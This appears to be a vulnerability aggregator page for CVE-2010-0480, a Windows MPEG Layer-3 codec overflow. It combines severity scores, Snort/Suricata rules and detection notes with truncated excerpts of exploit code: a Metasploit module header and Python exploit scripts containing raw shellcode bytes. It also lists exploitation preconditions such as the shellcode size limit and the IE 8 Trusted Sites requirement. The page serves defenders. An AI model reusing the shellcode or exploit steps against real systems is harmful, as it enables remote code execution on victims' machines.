CVE-2010-0480
published 2010-04-14CVE-2010-0480: Multiple stack-based buffer overflows in the MPEG Layer-3 audio codecs in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and…
PriorityP178critical9.3CVSS 2.0
AVNACMAuNCCICAC
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
67.89%
99.2th percentile
Multiple stack-based buffer overflows in the MPEG Layer-3 audio codecs in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allow remote attackers to execute arbitrary code via a crafted AVI file, aka "MPEG Layer-3 Audio Decoder Stack Overflow Vulnerability."
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x00\xff\xff\xff (nSamplesPerSecField at offset 4428 in AVI)
bytes
73 74 72 66 (strf chunk marker)
bytes
93 00 00 00 (MPEG Layer-3 codec identifier at distance:8 within:4 of strf)
snort
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET WEB_CLIENT Microsoft Windows MPEG Layer-3 Audio Decoder Buffer Overflow"; flow:established,to_client; flowbits:isset,ET.AVI.RIFF.Chunk; content:"|73 74 72 66|"; content:"|93 00 00 00|"; distance:8; within:4; reference:cve,2010-0480; reference:url,www.exploit-db.com/moaub-5-microsoft-mpeg-layer-3-audio-stack-based-overflow/; reference:url,www.exploit-db.com/exploits/14895/; reference:url,www.microsoft.com/technet/security/Bulletin/MS10-026.mspx; classtype:attempted-user; sid:2012143; rev:3; metadata:affected_product Web_Browsers, affected_product Web_Browser_Plugins, attack_target Client_Endpoint, created_at 2011_01_05, cve CVE_2010_0480, deployment Perimeter, confidence High, signature_severity Major, tag Web_Client_Attacks, updated_at 2019_07_26;)
bytes↗
\xEB\x6B\x5A\x31\xC9\x6A\x10\x52\x42\x52\x51\xFF\xD0\x53\x68\x7E\xD8\xE2\x73\xFF\xD6\x6A\x00\xFF\xD0\xFF\xD7\x50\x68\xA8\xA2\x4D\xBC\xFF\xD6 (shellcode stub)
- →Detect crafted AVI files delivered over HTTP by matching the RIFF/AVI strf chunk (|73 74 72 66|) followed at distance 8 by the MPEG Layer-3 codec tag |93 00 00 00|; the Emerging Threats flowbit ET.AVI.RIFF.Chunk must be set first.
- →The exploit patches the nSamplesPerSecField in the AVI stream header at file offset 4428 with the value \x00\xff\xff\xff to trigger the division-by-zero / overflow condition; AVI files with this value at that field offset should be flagged. ↗
- →The vulnerable component is l3codeca.acm version 1.9.0.306; presence of this file version on a host indicates an unpatched system susceptible to CVE-2010-0480. ↗
- →The .NET DLL memory-mapping technique loads shellcode at base address 0x72000000; memory forensics or crash dumps showing EIP/shellcode near this address are indicative of exploitation. ↗
- ·On IE 8 targets the malicious URL must be in the browser's Trusted Sites zone for the .NET control to load; exploitation will silently fail against IE 8 without this precondition. ↗
- ·The overflow only overwrites the three least-significant bytes of the saved EIP with 0x00; standard ROP/ret2libc techniques do not apply — exploitation relies on the .NET DLL memory-mapping technique to place shellcode at a predictable address. ↗
- ·The Metasploit module requires .NET CLR to be installed on the target; without it the exploit will not function. ↗
- ·The shellcode embedded in exploit.dll must not exceed 735 bytes; the exploit generator will abort if this limit is exceeded. ↗
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-cw97-jmj5-gm8h: Multiple stack-based buffer overflows in the MPEG Layer-3 audio codecs in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1
ghsa_unreviewed·2022-05-02
CVE-2010-0480 [HIGH] CWE-119 GHSA-cw97-jmj5-gm8h: Multiple stack-based buffer overflows in the MPEG Layer-3 audio codecs in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1
Multiple stack-based buffer overflows in the MPEG Layer-3 audio codecs in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allow remote attackers to execute arbitrary code via a crafted AVI file, aka "MPEG Layer-3 Audio Decoder Stack Overflow Vulnerability."
VulnCheck
Microsoft Windows Improper Restriction of Operations within the Bounds of a Memory Buffer
vulncheck·2010·CVSS 9.3
CVE-2010-0480 [CRITICAL] Microsoft Windows Improper Restriction of Operations within the Bounds of a Memory Buffer
Microsoft Windows Improper Restriction of Operations within the Bounds of a Memory Buffer
Multiple stack-based buffer overflows in the MPEG Layer-3 audio codecs in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allow remote attackers to execute arbitrary code via a crafted AVI file, aka "MPEG Layer-3 Audio Decoder Stack Overflow Vulnerability."
Affected: Microsoft Windows
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://users.ece.cmu.edu/~tdumitra/public_documents/bilge12_zero_day.pdf
Suricata
ET WEB_CLIENT Microsoft Windows MPEG Layer-3 Audio Decoder Buffer Overflow
suricata·2011-01-05
CVE-2010-0480 ET WEB_CLIENT Microsoft Windows MPEG Layer-3 Audio Decoder Buffer Overflow
ET WEB_CLIENT Microsoft Windows MPEG Layer-3 Audio Decoder Buffer Overflow
Rule: alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET WEB_CLIENT Microsoft Windows MPEG Layer-3 Audio Decoder Buffer Overflow"; flow:established,to_client; flowbits:isset,ET.AVI.RIFF.Chunk; content:"|73 74 72 66|"; content:"|93 00 00 00|"; distance:8; within:4; reference:cve,2010-0480; reference:url,www.exploit-db.com/moaub-5-microsoft-mpeg-layer-3-audio-stack-based-overflow/; reference:url,www.exploit-db.com/exploits/14895/; reference:url,www.microsoft.com/technet/security/Bulletin/MS10-026.mspx; classtype:attempted-user; sid:2012143; rev:3; metadata:affected_product Web_Browsers, affected_product Web_Browser_Plugins, attack_target Client_Endpoint, created_at 2011_01_05, cve CVE_2010_0480, deployment
Exploit-DB
Microsoft MPEG Layer-3 Audio - Stack Overflow (MS10-026) (Metasploit)
exploitdb·2011-08-13
CVE-2010-0480 Microsoft MPEG Layer-3 Audio - Stack Overflow (MS10-026) (Metasploit)
Microsoft MPEG Layer-3 Audio - Stack Overflow (MS10-026) (Metasploit)
---
##
# $Id: ms10_026_avi_nsamplespersec.rb 13555 2011-08-13 02:15:05Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow',
'Description' => %q{
This module exploits a buffer overlow in l3codecx.ax while processing a
AVI files with MPEG Layer-3 audio contents. The overflow only allows to overwrite
with 0's so the three least significant bytes of EIP saved on stack are
overwritten and shellcode is mapped usi
Exploit-DB
Microsoft MPEG Layer-3 Audio Decoder - Division By Zero
exploitdb·2010-09-24
CVE-2010-0480 Microsoft MPEG Layer-3 Audio Decoder - Division By Zero
Microsoft MPEG Layer-3 Audio Decoder - Division By Zero
---
'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ <
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/
http://www.exploit-db.com/moaub-24-microsoft-mpeg-layer-3-audio-decoder-division-by-zero/
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15096.zip (moaub-24-mp3-exploit.zip)
'''
'''
Title : Microsoft MPEG Layer-3 Audio Decoder Division By Zero
Version : l3codeca.acm 1-9-0-306 (XP SP2 ñ XP SP3)
Analysis : http://www.abysssec.com
Vendor : http://www.microsoft.com
Impact : Med/High
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
MOAUB Number : MOAUB-02
'''
import sys
import struct
de
Exploit-DB
Microsoft MPEG Layer-3 - Remote Command Execution
exploitdb·2010-09-05·CVSS 9.3
CVE-2010-0480 [CRITICAL] Microsoft MPEG Layer-3 - Remote Command Execution
Microsoft MPEG Layer-3 - Remote Command Execution
---
'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _
'''
fHTML = open('index.html', 'w')
fHTML.write(strHTML)
fHTML.close()
fdR = open('exploit.dll', 'rb+')
strTotal = fdR.read()
str1 = strTotal[:1380]
str2 = strTotal[2115:]
shellcode = '\xEB\x6B\x5A\x31\xC9\x6A\x10\x52\x42\x52\x51\xFF\xD0\x53\x68\x7E\xD8\xE2\x73\xFF\xD6\x6A\x00\xFF\xD0\xFF\xD7\x50\x68\xA8\xA2\x4D\xBC\xFF\xD6\xE8\xDA\xFF\xFF\xFF\x00\x54\x68\x65\x20\x65\x78\x70\x6C\x6F\x69\x74\x20\x77\x61\x73\x20\x73\x75\x63\x63\x65\x73\x73\x66\x75\x6C\x21\x00\x5E\x6A\x30\x59\x64\x8B\x19\x8B\x5B\x0C\x8B\x5B\x1C\x8B\x1B\x8B\x5B\x08\x53\x68\x8E\x4E\x0E\xEC\xFF\xD6\x89\xC7\xE8\xB3\xFF\xFF\xFF\x55\x53\x45\x52\x33\x
Metasploit
MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow
metasploit
MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow
MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow
This module exploits a buffer overflow in l3codecx.ax while processing a AVI files with MPEG Layer-3 audio contents. The overflow only allows to overwrite with 0's so the three least significant bytes of EIP saved on stack are overwritten and shellcode is mapped using the .NET DLL memory technique pioneered by Alexander Sotirov and Mark Dowd. Please note on IE 8 targets, your malicious URL must be a trusted site in order to load the .Net control.
Securelist
Investigation Report for the September 2014 Equation malware detection incident in the US
blogs_securelist·2017-11-16
Investigation Report for the September 2014 Equation malware detection incident in the US
Authors
- Kaspersky
## Background
In early October, a story was published by the Wall Street Journal alleging Kaspersky Lab software was used to siphon classified data from an NSA employee’s home computer system. Given that Kaspersky Lab has been at the forefront of fighting cyberespionage and cybercriminal activities on the Internet for over 20 years now, these allegations were treated very seriously. To assist any independent investigators and all the people who have been asking us questions whether those allegations were true, we decided to conduct an internal investigation to attempt to answer a few questions we had related to the article and some others that followed it:
1. Was our software used outside of its intended functionality to pull classified information from a person’s c
Securelist
Investigation Report for the September 2014 Equation malware detection incident in the US
blogs_securelist·2017-11-16
Investigation Report for the September 2014 Equation malware detection incident in the US
Authors
Kaspersky
## Background
In early October, a story was published by the Wall Street Journal alleging Kaspersky Lab software was used to siphon classified data from an NSA employee’s home computer system. Given that Kaspersky Lab has been at the forefront of fighting cyberespionage and cybercriminal activities on the Internet for over 20 years now, these allegations were treated very seriously. To assist any independent investigators and all the people who have been asking us questions whether those allegations were true, we decided to conduct an internal investigation to attempt to answer a few questions we had related to the article and some others that followed it:
Was our software used outside of its intended functionality to pull classified information from a person’s comput
http://securityreason.com/securityalert/8336http://www.us-cert.gov/cas/techalerts/TA10-103A.htmlhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-026https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7441http://securityreason.com/securityalert/8336http://www.us-cert.gov/cas/techalerts/TA10-103A.htmlhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-026https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7441
2010-04-14
Published
Exploited in the wild